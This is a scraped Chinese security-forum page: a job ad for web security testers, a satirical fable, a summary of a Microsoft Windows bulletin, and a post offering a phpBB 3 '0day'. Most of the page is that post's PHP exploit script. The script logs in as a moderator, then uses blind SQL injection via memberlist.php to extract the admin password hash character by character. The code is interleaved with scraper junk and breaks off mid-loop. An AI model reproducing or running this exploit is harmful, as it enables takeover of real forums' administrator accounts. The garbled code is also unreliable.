最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师
    9 a: g, W* k+ m* \人数:4人+ e. @+ @% q/ [* j% _. W1 O6 y
    工作地点:杭州4 l  C5 C1 N) t' y% e0 t
    截止日期:2012年8月30日
    ' F' C4 n( k( P* e. T8 _学历要求:本科或以上均可
    3 k4 R. p; \% }岗位要求:# _6 F) v$ c% S6 p- [
    1. 熟悉ASP/.NET/java/php等常见web代码;# F) x" b: r( f/ O! z  T. m
    2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;
    $ \4 C- N" h1 @  W3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;
    . F# r3 L8 u' Y# f) |% F- E4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;
    # Z  [0 L8 b1 N3 `5. 2年以上web安全工作经验,对web安全测试有自己的理解;
    7 `& V( A5 n. R7 F8 k& G/ [/ G6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。
    2 {; E  a, g1 S8 ?具备以下相关条件者将优先考虑:1 I' c' `# V+ h5 E* [0 {$ o- C
    1.熟悉涉密信息系统以及相关技术要求;1 U3 r# C& l3 B  h6 [: T
    2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;2 g& }# P1 N+ o2 c  z
    3.熟练使用Linux操作系统,了解内核安全机制;: O! \: [* V' u0 T& X5 b. i$ l# B
    4.有内网渗透经验,擅于独立挖掘web安全漏洞;
    4 a4 U/ P$ }8 b% b+ `  |5.对等级保护标准、评估流程等非常熟悉的优先;
    4 G+ w6 g9 z1 p) D+ H/ r8 R6.对cisco、ids、ips等有一定 研究;
    : m, |/ u4 l: w7.一年以上信息安全工作经验;, c% R: D9 G% U+ f* R' Q
    8.具有网络、系统安全方面证书。
    " M3 b# g- ?& }1 w: w* c9.有一定的软件编程经验和逆向分析经验优先;1 W- E# H3 X' p* H/ X
    有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。
    ! [0 V0 }+ ?+ |9 @
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/
    1 h) q4 K9 I3 G+ v+ ?2 D  }+ a
    ( H; t% m2 B8 [" y/ m) B4 w4 f) c

    3 e4 m1 o: r. B# Y5 r) e( f! d1 Z, V6 ~/ l1 g( L4 {( `/ R! R; f/ ?

    ' v1 a: ~# ]: k
    7 b2 f1 X) O# X. B4 |$ B( X2 M) k. [
    & V) ^2 S' B( V/ P" l  ^
    + {* [' g4 h1 |" H* e# V" O

    ( m. y' m0 B+ X% Q2 \2 H1 Z. s9 t0 L* s4 W, D
    . v" X& x5 X* `7 |( V9 m# U
    2 T2 n5 m5 u( X1 D5 Y8 f, U
    5 g8 g" f5 B, c' q7 a- @+ U! _0 {& s

    ; P6 U1 K/ B, L" ?8 N5 \% f# V0 B" w% ]) _

    8 h& X0 }3 _1 ?% G! `2 u9 s# u/ b6 p
    ; I( e) S, c; q# g5 o/ Q
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~    @$ }0 m$ P. q9 B2 J" X
    7 \- V( U2 \: V3 N# ~8 _  y! T

    ; ~/ Q1 d, q; Z' m1 m1 m
    * j* W2 K9 ~6 M8 b3 h3 O% q7 Z5 {6 Q( ~) J/ g1 c) P2 q8 |/ X

    " ~% H+ N1 y5 |! v2 g4 d7 C
    + q" k6 \% `) A; p; s" f+ b  {9 z* f: @) e5 g

    - V, [8 ^6 C3 X4 }
    6 t1 f' o: _% F- g7 D! ~% |
    8 m/ l  w* g6 O# a; L1 b$ }
    0 s) C* ?6 e0 x0 ]! d3 \+ G  h3 u
    , v+ A( n0 V4 l* N- g& H- _. W: A7 s2 W1 y, M1 O* t1 }5 H0 c/ x
    ) x; c! L  J% V% w- E& ^

    4 b6 k; N- E6 }$ o2 Q) r( u2 z/ C' \* C0 r

    * u/ @$ s1 x, ]! d
    1 l2 h( d: _! j0 j# K, b公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0
    % B8 U% Y4 m* A9 g
    摘要

    / {/ O. u1 W8 r0 f* a! B$ x
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    7 q. d+ a& F/ o, c% {+ V
    建议。 Microsoft 建议用户立即应用此更新。
    2 E! p; m6 y1 l/ ?1 d+ T- |9 \0 y
    受影响的软件
    2 ~( b( @9 ?/ N+ _. A
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045

    + c$ B  Q) a4 R' C+ {
    不受影响的软件
    5 k0 u: ]& O+ T7 E+ M) N( K. e
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64

    6 [. }  |2 I. [& N% E  K
    微软的安全公告:

    0 c5 V" K- `0 C
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx

    % f( G0 Q1 l2 S7 Q, |2 q1 c: g
    (以上链接均连到第三方网站)
    ' q' }, w; L' `9 J# S8 n

    ' V% n& ?8 I2 |) ~  a2 T0 {' b/ B; }

    5 T+ O; b7 I  ?: i( w# j7 n- E! f% @  [* Z' v  n+ e0 r9 q0 E
    + d$ c0 C; z! Q' l) O
    $ q$ d: @* R. K
    * L; b7 n. c9 B3 _3 w

    ; G4 c5 l, z% T) V( q- n5 o& W2 E% s' O7 V+ l  X) W

    ! H) C: C0 J) p# l
    ) L, O9 W. T2 M. S) j
    ( R# {, m: I; @. h2 `5 u
    2 @+ ]; r% d, l6 J
    % t4 n! ^' I3 B. r: S( a
    / |) z( @/ i5 t' C4 e) M1 @: Z6 P5 m+ q5 t7 ~' [. A

    9 ]$ M/ L0 h" T0 m2 j. ?) L2 q# |5 [) y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on " m. k  `; S: ~* C' L; V! B
    <?
    # ]5 u, Y5 B- T6 N. @echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
    6 {2 k" U# C2 v2 ~& ^"; 2 R- M$ z2 I$ O3 [& p; e) K3 K5 F
    echo "by Hackerz5 hackerz5x@yahoo.com
    ( l3 K+ T: \( i4 {5 x: W2 N4 W5 w"; ! G9 `" \( n1 v: @  `2 K5 @9 `
    echo "site: http://hackerz5.com
    ' L3 l3 G, M- |; m, {";
    8 ]1 W. f9 ~% ?3 X* ]echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"/ K3 e2 _+ k. d% I% J  V

    9 H: |1 }$ X+ g& W, H8 ]";
    ! H/ C! {& }# H) @/*
    , q  s  u6 M$ c, mworks regardless of php.ini settings 6 d/ J, ^3 g: g3 t
    you need a global moderator account with "simple moderator" role 5 f. g* T: b) S, @4 I
    */
      W! r' w* I( M8 Y0 x9 hif ($argc<5) { $ w3 M2 B; y' \2 R7 t  g
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS' a! e3 U' f# t' }- \) W* }5 E
    "; 7 m7 [; I2 x+ |/ _  b7 Q$ H3 Z% C
    echo "host: target server (ip/hostname)
    9 X% ?5 J) a& b"; + D" }, t5 m9 {2 N) X' o
    echo "path: path to phpbb3
    " d! Z2 r, i$ e5 ~. S"; * |% _7 d* P2 P$ y! m8 `
    echo "user/pass: u need a valid user account with global moderator rights: B( b# B! h8 }% l, `, `4 z
    "; $ ~& B% {) `4 v0 g
    echo "Options:0 q3 ~/ G9 [0 c' t6 N
    ";
    3 Y5 e% V  c9 `* F8 [. o* Mecho " -T[prefix] specify a table prefix different from default (phpbb_)
    ' `& J/ W$ s  |0 Y7 q) }8 _";
    2 L7 J6 q0 \& r8 G- p4 }echo " -p[port]: specify a port other than 806 g# L: ~3 E1 r, g5 ]5 \: m) G
    ";
    & d- v+ y; v" l# z- [echo " -P[ip:port]: specify a proxy
    & p2 O* k* W/ L1 }; }"; % B& v8 H+ u5 G' C5 K) a  f
    echo " -u[number]: specify a user id other than 2 (admin); W' r! e" _5 \- N7 E& m
    "; + I: N4 z0 Q7 t& s3 W: M
    echo " -x: disclose table prefix through error messages+ I. S1 g* ?/ {$ R2 K( W% a
    "; $ D9 t& {- ]8 `* q
    echo "Example:7 j9 \! w% o8 e1 }% T
    ";
    5 R6 T+ q- g; m0 y% F: ?' v: i* zecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    9 q' ^9 |. m: t! r" O- g: P"; : d0 s' C, u$ d3 K5 g# s9 q
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u77 N# H6 A9 O2 ]! ^* r
    ";
    , w8 j4 z  f1 m: }die;
    # f" B% H5 o/ S3 P7 E0 W$ H0 z}
    + P& Z" Y% n( x1 F8 X+ J4 M( U+ perror_reporting(0); + q; k  \/ L2 Q, M, z6 V- Y
    ini_set("max_execution_time",0);
    6 i* h) {3 [0 }4 ?ini_set("default_socket_timeout",5);
    - X  n# o" o" V4 m8 L: Vfunction quick_dump($string) . H9 q2 Y4 S3 A8 G8 W- r) I9 h. h8 w' Q
    {
    0 O; p# [1 D; b: w! _$result='';$exa='';$cont=0;
    ) V+ d, I4 u0 p% ?" ^/ p: g8 x8 Pfor ($i=0; $i<=strlen($string)-1; $i++)
    3 `  J1 `" Y( p* p" }{
    6 c% s( n8 c) B4 q. qif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    - J+ P/ k- g: l9 Z6 D& h{$result.=" .";}
    ' `# y  U5 M& ^else " J6 v' S( e9 l* i
    {$result.=" ".$string[$i];}
    / F* m9 }6 ?9 q9 n+ i1 Aif (strlen(dechex(ord($string[$i])))==2)
    $ r* Z% _% b/ M+ _4 \{$exa.=" ".dechex(ord($string[$i]));}
    " ~3 p) Z& y; l+ t9 celse : V# ]  K4 n' |% [! A) A
    {$exa.=" 0".dechex(ord($string[$i]));}
    + s' U8 V( |; p3 n7 ~5 y% Q$cont++;if ($cont==15) {$cont=0; $result.="! g! G0 n+ g* a, N# a+ U
    "; $exa.="
    6 F0 F1 ]! D) o7 q# T$ v3 t5 T6 U";}
    2 [# `) R2 C8 u% u0 _% i8 L) B} 2 B+ H0 \  z" H5 [# O5 [
    return $exa."
    5 V# X" d. B$ D) j* {".$result;
    ' ~& ~9 s, h4 _} - j: v1 o8 c5 a) v
    $proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; ) j# I% z  C0 m5 e7 f2 A7 m9 c" |
    function sendpacketii($packet)
    ) @5 L5 m6 e0 A! B3 |# A" H{ * R& `, i1 {8 l
    global $proxy, $host, $port, $html, $proxy_regex;
    , q+ G9 c8 E8 u8 U' k% _. \if ($proxy=='') { ( l8 y/ R6 ?! y( J
    $ock=fsockopen(gethostbyname($host),$port);
    6 q" X0 c! L9 ^+ @2 S! gif (!$ock) {
    : e) c6 s% X9 G# S3 Iecho 'No response from '.$host.':'.$port; die;
    2 ^2 g( u3 Q5 l1 A. W}
    4 ?  n; Z" b4 q. N6 G}
    2 x9 G! I- `( [: kelse { 7 m3 b, S. Z: `4 C5 V
    $c = preg_match($proxy_regex,$proxy);
    . i1 k/ `: |& E: pif (!$c) { 1 ^, p6 ?# e, U0 P: Z
    echo 'Not a valid proxy...';die; : j# @1 Y+ ]; R, Y( Z2 j
    } ' e* y+ v! _/ Z
    $parts=explode(':',$proxy);
    5 L, B2 V& X+ \8 yecho "Connecting to ".$parts[0].":".$parts[1]." proxy...  K: w& Z7 N$ P" \
    ";
    ! [' ]9 f- T* [% |! N  x$ock=fsockopen($parts[0],$parts[1]); & ~* a0 e. o# b9 q, m* A
    if (!$ock) { # c/ K7 X+ `; @! l! W1 C. j: A2 U
    echo 'No response from proxy...';die;
    $ h# j8 I/ Z! R7 r! w1 Z1 l, \} ' \$ C! W% `" J% A! L; {+ }
    } 1 Q1 g" {, w, _* B0 `
    fputs($ock,$packet);
    7 k, {* T+ n- z2 J1 A# `! T2 }* ~if ($proxy=='') { # V2 Y: s* A9 w7 l7 F  k" @
    $html='';
    . x4 W- @* n1 {2 i. v/ C+ Wwhile (!feof($ock)) {
    * g5 x' m3 b0 i2 u+ N6 X$ S$html.=fgets($ock); * @- y7 g1 e6 Y2 g0 R/ x
    } . {  ~1 |& E$ u
    } * l1 O) h: N, i+ v4 [
    else { 4 y) M1 v% D6 H4 T/ W. s4 L
    $html='';
    6 {; @; I/ }9 Ewhile ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { 0 C! Y9 ?& u. K% l
    $html.=fread($ock,1);
    6 C; M: D0 m  }7 k, n# P} * V# ]2 d+ W/ E1 \6 G( V
    }
    ( C' E/ ~5 P$ `; f& e) P! cfclose($ock); 7 q: B: x; R8 E3 ^5 a
    #debug
    : d7 W: @/ I* y+ D; b#echo "
    # j# _5 `0 f( h- G".$html; ' _& {* Z, `- H' a- d/ u
    } " x* ?- \/ |; ~$ G2 w
    $host=$argv[1];
    # _# p% @+ c! R  d8 ~5 q$path=$argv[2]; ( O" V2 i2 m; J; h7 y$ E
    $user=$argv[3];
    9 }5 @) z1 e4 @$pass=$argv[4]; # g# k( X* r) [- j
    $port=80;
    ( r3 H1 ^$ F6 w$prefix="PHPBB_"; 0 e% O* Q* X4 A3 b. k) `& G$ g
    $user_id="2";//admin
    ! x; z/ K/ c- t, e& Q$discl=0;
    7 ~, @9 I* t% j6 z, S6 Z$proxy="";
    ) n4 b4 k3 w, O" T9 b* x& F# O( p; Gfor ($i=3; $i<=$argc-1; $i++){
    3 _/ ~; Y9 H: g0 E5 _$temp=$argv[$i][0].$argv[$i][1]; . D( |+ D: x+ ~7 c2 m) z; n5 T
    if ($temp=="-p")
    0 |/ k( b; u, h1 M  |  l{
    - `+ @6 A, V5 H/ K- O' l$port=str_replace("-p","",$argv[$i]);
    6 f8 p7 @/ a) r  n6 ~( j} 7 a7 r4 \/ h" r, B7 t- X
    if ($temp=="-P") : a3 P+ ^# |1 ]  z
    { 4 h9 _; w* O* h& j4 |( D
    $proxy=str_replace("-P","",$argv[$i]);
    $ i) m. ?7 F( U7 t$ G. X7 P} 6 A5 M7 g) e; L2 A8 d3 A  q
    if ($temp=="-T")
    ' ^0 l9 m5 B- o+ c{
    5 k# T' B- k1 p0 h% k% F$ \$prefix=str_replace("-T","",$argv[$i]); % y5 Y  U6 M% h, A
    }
    & d# c; u! E& \7 Iif ($temp=="-u")
    3 [$ T) C( e" i3 a. K) C{ ! {' z, {  [- M/ Q2 n
    $user_id=str_replace("-u","",$argv[$i]); 0 ~$ K- P: v7 y7 h" o6 g% C1 k
    }
    8 V, y0 ~! f- p( vif ($temp=="-x") % q" J; l- @* X' a2 w2 }* E3 X
    {
    $ G4 P# ?9 f; k$discl=1; 4 }: ~1 }8 |7 R) b& u5 R+ a
    }
    8 x( F0 c8 G! \" J- x} " s2 Z% x7 Y, E  Q2 G
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} + \# L/ {. [" `2 z- [
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} " u5 H8 c  I& T/ L! T
    $data="username=".urlencode($user);
    1 S5 X6 }% j# [6 S6 y' b$data.="&amp;password=".urlencode($pass); 6 G0 v% P1 M8 l1 h/ i
    $data.="&amp;redirect=index.php"; + B3 P/ P: _' z; ?5 i
    $data.="&amp;login=Login"; 0 Y; l, i5 o. E8 W0 r$ U+ b: b! [
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0
    ; Q+ Y3 [: E# }6 i$ W. t"; 4 {6 w3 N# N% T+ y. |
    $packet.="Referer: http://$host$path/ucp.php?mode=login
    0 q) ]+ N: V& u7 @";
    + U% w( ]; q$ I$packet.="Content-Type: application/x-www-form-urlencoded! P' o' V$ ]" u1 n& x, Q. b/ X
    ";
    0 k+ T: g8 G; }' d* l- Z) j$packet.="Accept-Encoding: text/plain
    1 A, ~' Y4 v3 ?. G, J: J8 ?"; : A' w; `( ^; W( E8 y1 T4 F( I
    $packet.="Host: ".$host."
    * m! ]" D4 e& {- T";
    / a) G' m* k2 S7 C' k$packet.="Content-Length: ".strlen($data)."
    9 I+ \( ~" i* c) R/ g( m& Y) O";
    & \2 `! E0 j2 W. e4 e& P: A/ J$packet.="Connection: Close
    7 l7 q2 D  s. A% f; e* V5 U" _& v6 _9 E. s: q2 V  z
    ";
    ; f# E7 G7 h7 \, ^# F$packet.=$data; , [& @* n9 `* _$ k
    sendpacketii($packet);
    . K/ B; S5 V* ~! O$cookie="";
    + I3 ~7 P9 g( f3 k$temp=explode("Set-Cookie: ",$html); / t; I& `7 W) h4 t6 O4 H! e
    for ($i=1; $i<=count($temp)-1; $i++) , W8 C  l1 R6 |# E5 M' T! y
    {
    + p, w& ^: K9 I' R$ ?6 |/ w$temp2=explode(" ",$temp[$i]);
    9 K3 j1 N- n  U* |$cookie.=" ".$temp2[0];
    ( X* d0 n. p) y& I/ c}
    ) T7 n/ \! e) \/ f6 c7 Wif (eregi("_u=1;",$cookie))
    " U! m, `" U+ Z3 `{
    ! O; V# b- A% a& O) E  Q# L//echo $html."& m2 h' J- J& u: I$ O3 P
    ";//debug ' ?5 W; h; g5 X, e) k
    //die("Unable to login...");
    ! ~" l$ g% b9 p} 6 [3 l- p1 x: W$ Y# P
    echo "cookie -> ".$cookie."1 Y4 f6 H7 U; h8 G! W/ w
    ";
    0 Z9 P4 N% @& Y# ]& M4 X, Yif ($discl)
    : P1 z- K( H" h/ U{ - w& [; [3 a  n; y  I, \
    $sql="'suntzuuuuu"; % `( H8 Y% y$ N4 ^
    echo "sql -> ".$sql."
    # I; o' s$ b! d% y9 ]  R4 |4 \"; 5 [6 K0 p4 n4 Q  z
    $sql=urlencode(strtoupper($sql)); . u% v; n" f, a! L4 L+ f
    $data="username=";
    / a( ]. T% z/ C+ `1 Z" l+ R$data.="&amp;icq="; + v$ y4 s! s) R2 |2 O9 A- l8 t
    $data.="&amp;email="; % x. g3 w4 C$ r5 o; w  A! V: x5 ^
    $data.="&amp;aim=";
    - S* w9 `: ]: j9 K" r4 H, q$data.="&amp;joined_select=lt";
    . t- y4 h/ r: O4 ?* E$data.="&amp;joined="; 2 i: f% b9 c) u
    $data.="&amp;yahoo="; 4 _5 g2 T0 D/ q- e( {& G
    $data.="&amp;active_select=lt";
    ' Z$ I2 x8 |4 E" K$data.="&amp;active="; ! I: u( v0 q+ B. B, O- G
    $data.="&amp;msn=";
    0 p+ [' C& ~8 I# \) w6 M$data.="&amp;count_select=eq"; 7 h9 n* S# l+ P) L& a7 n
    $data.="&amp;count=";
    ! ]0 K1 P. R/ o3 n5 C3 D$data.="&amp;jabber="; 4 K) \4 R" R( G7 \; f9 Y2 p
    $data.="&amp;sk=c"; + d' g  J6 v  {, Q
    $data.="&amp;sd=a"; 5 f% Y2 l8 y, ]" Z* a
    $data.="&amp;ip=".$sql; 3 k3 y) t  v7 g
    $data.="&amp;search_group_id=0"; + `+ Q& o0 y( J# |+ ~: y( O7 \) t* c
    $data.="&amp;submit=Search"; : W& |% x$ @( @6 t/ {# f- t. i
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0# O; h+ ?0 \' W% |* `3 L
    ";
    ; ?$ D! z" G; D: v( e& c' `$packet.="Content-Type: application/x-www-form-urlencoded) ]& {" x. y# _
    "; 5 I) h& k' `5 V8 X+ x  N& G6 i: M
    $packet.="Host: ".$host."9 v$ Y! d3 N; \$ V3 V
    ";
    . R/ c: H. i" S8 L5 H- |0 O$packet.="Content-Length: ".strlen($data)."
    # q/ C9 J7 L* ?"; 9 W1 Q+ l) @" y; A
    $packet.="Connection: Close
    - c  M. e! X" h' w+ ]* @. Z"; : v, |( V( C/ J* p9 z! N$ b' R
    $packet.="Cookie: ".$cookie." * y! Z% A; o' C! S3 m8 c
    ; `; k+ `3 t  I: {/ R  \
    ";
    # K9 }# ]( n3 V% I$ {! Z/ i$packet.=$data; % u$ Y; |8 y( N7 M1 x" L+ W
    sendpacketii($packet);
    . F1 {: b; Q) m3 G; S& j8 Qif (strstr($html,"You have an error in your SQL syntax")) - K3 O4 U- j- j5 K+ I! W
    { $ H; i9 h% s' T+ m+ ?
    $temp=explode("posts",$html); * u  G2 L- n; n, K
    $temp2=explode(" ",$temp[0]);
    ! X8 [- ]4 x1 R3 [0 J: P% C+ W( B6 G$prefix=strtoupper($temp2[count($temp2)-1]);
    3 Q1 s) t4 g) b# `+ k9 X" D7 J6 ~echo "prefix -> ".$prefix.") q: x1 ~2 C# g' E3 `" f/ F- a- t
    ";sleep(2); : ~! L$ K2 x  v9 P0 ^0 c
    }
    ' {  C( M8 d2 M" j4 l} * k+ e' h4 \' B6 ~
    $md5s[0]=0;//null ; z+ C+ _( S& e) F; E+ d
    $md5s=array_merge($md5s,range(48,57)); //numbers " `* D$ \% h/ W" t+ `6 {; a
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    . l8 c% m0 F: y2 I) k/ D//print_r(array_values($md5s)); % O0 Z0 j5 n$ m$ y2 B4 h: M
    $j=1;$password="";
    2 {. p" H! W2 d: H" h. awhile (!strstr($password,chr(0))) * G; P8 h! {3 R' B. H" W
    { : B8 a$ A6 N' _6 ]7 E
    for ($i=0; $i<=255; $i++)
    9 e# H& W+ w( x+ J) S3 [5 W1 Y, D{
    ' @7 H, x, q' e+ s2 Y8 Kif (in_array($i,$md5s))
    1 H6 c3 e7 u" U% \: |{ % o9 ?/ `/ g7 y; b! N
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; ( D, M7 s: d$ u2 u, }
    echo "sql -> ".$sql."# {0 s% G; s, Y% c
    ";
    0 _2 P3 l( b5 x: S$ }5 q  j* F$sql=urlencode(strtoupper($sql));
    8 @' j: V" R* {0 ?1 y6 d3 t$data="username=";
    " h: X, v1 Y4 Z: E  h$data.="&amp;icq="; ) ]% r) w* |2 B3 ]2 ~0 D! n
    $data.="&amp;email="; ) l) n+ r$ ?& e
    $data.="&amp;aim=";
    6 s$ u$ R( X+ S# T$data.="&amp;joined_select=lt"; 7 `7 a/ o# L: S; X8 g
    $data.="&amp;joined=";
    9 }: v3 a  C) r1 \, Q% [7 S$data.="&amp;yahoo="; & N6 }5 v3 I4 n# n9 `
    $data.="&amp;active_select=lt";
      }. R3 C+ p1 a+ n$data.="&amp;active="; 9 F. k3 B/ U$ z7 z/ \
    $data.="&amp;msn=";
    9 h7 N* B0 K8 V$ ?* c' u$data.="&amp;count_select=eq";
    ' |" u; W" K" o; [$data.="&amp;count="; 5 U" K, i* \' @/ U  o( \
    $data.="&amp;jabber=";
    - q. F' Q) g. F$ L7 `$data.="&amp;sk=c"; ( T* M. n+ A( |3 \, F* U: |+ M/ t
    $data.="&amp;sd=a"; 5 q8 n: o1 X3 x. }7 e& v
    $data.="&amp;ip=".$sql;
    + H7 T' u3 c# I2 c8 k. Q$data.="&amp;search_group_id=0"; 2 D9 T/ o4 o2 O$ j
    $data.="&amp;submit=Search"; % i1 \  m7 u4 }' S" \
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.06 P# r  a6 Q3 z
    ";
    + |0 l/ `  [# i; r" t5 l1 `1 p$packet.="Content-Type: application/x-www-form-urlencoded, l1 ~( w( T4 O+ M$ D
    "; - P& |# P. s3 k1 B0 H2 j& {
    $packet.="Host: ".$host."5 |" l6 r. l+ ?7 p; b
    ";
    $ T9 _2 S" i$ p, T$packet.="Content-Length: ".strlen($data)."7 G4 ?  Q: ~9 f
    "; ) v5 b0 t  H/ q# O6 ^: m9 v$ ?7 C$ c
    $packet.="Connection: Close9 ?2 O4 m) u' ^
    ";
    + U) S5 d/ n' R. g4 `3 T. m# }$packet.="Cookie: ".$cookie." , e8 t& `; b' @* y

    $ `4 c' h+ N, y# k( J";
    2 i5 m. F) V2 p2 w$packet.=$data; - T* H6 M7 n3 f& V' ^4 I
    sendpacketii($packet); , s: P/ S) @3 K0 `
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]( I- g2 R8 B; B3 D+ e
    ";sleep(2);break;}
    5 {# Z$ j6 Y; ]}
    # |) G  V3 J3 Yif ($i==255) {die("Exploit failed...");} 5 W! z  r/ n1 E# _. g7 T
    }
    ! M  f$ Q% `. R( b! W. ?; @3 ]$j++; 9 {' B5 p# @$ M) w/ Y1 Y" G4 a/ b5 j
    } # P+ h3 f/ F! |$ b( B7 r
    $j=1;$admin=""; + s  |9 l% f; u" W4 ~) q" u  ]! s, f' m
    while (!strstr($admin,chr(0))) 2 O* W6 \3 Y: Q! T2 S: c- u
    { ! a7 H, u/ e8 i, J/ U) D( Q$ G/ U- N
    for ($i=0; $i<=255; $i++)
    4 Z* v0 }/ c2 z; i# K& Q5 S% Q/ O1 L{
